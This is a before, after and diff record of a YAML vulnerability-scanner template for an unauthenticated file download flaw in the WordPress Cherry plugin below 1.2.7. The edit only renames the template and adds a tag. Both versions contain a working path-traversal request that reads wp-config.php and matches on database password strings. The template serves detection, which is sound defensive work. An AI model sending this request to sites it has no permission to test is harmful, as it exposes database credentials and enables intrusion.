vulnerabilities/wordpress/cherry-file-download.yaml (before)
id: cherry-file-download

info:
  name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download
  author: 0x_Akoko
  severity: high
  description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading
    backdoor shell scripts or downloading the wp-config.php file.
  reference:
    - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
    - https://github.com/CherryFramework/cherry-plugin
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/04/21

vulnerabilities/wordpress/cherry-file-download.yaml (after)
id: cherry-file-download

info:
  name: Cherry Plugin < 1.2.7 - Arbitrary File Retrieval and File Upload
  author: 0x_Akoko
  severity: high
  description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
  reference:
    - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
    - https://github.com/CherryFramework/cherry-plugin
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,wpscan

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/04/21

vulnerabilities/wordpress/cherry-file-download.yaml (diff)
@@ -1,11 +1,10 @@
 id: cherry-file-download
 
 info:
-  name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download
+  name: Cherry Plugin < 1.2.7 - Arbitrary File Retrieval and File Upload
   author: 0x_Akoko
   severity: high
-  description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading
-    backdoor shell scripts or downloading the wp-config.php file.
+  description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
   reference:
     - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
     - https://github.com/CherryFramework/cherry-plugin
@@ -13,7 +12,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 8.6
     cwe-id: CWE-22
-  tags: wordpress,wp-plugin,lfi
+  tags: wordpress,wp-plugin,lfi,wpscan
 
 requests:
   - method: GET
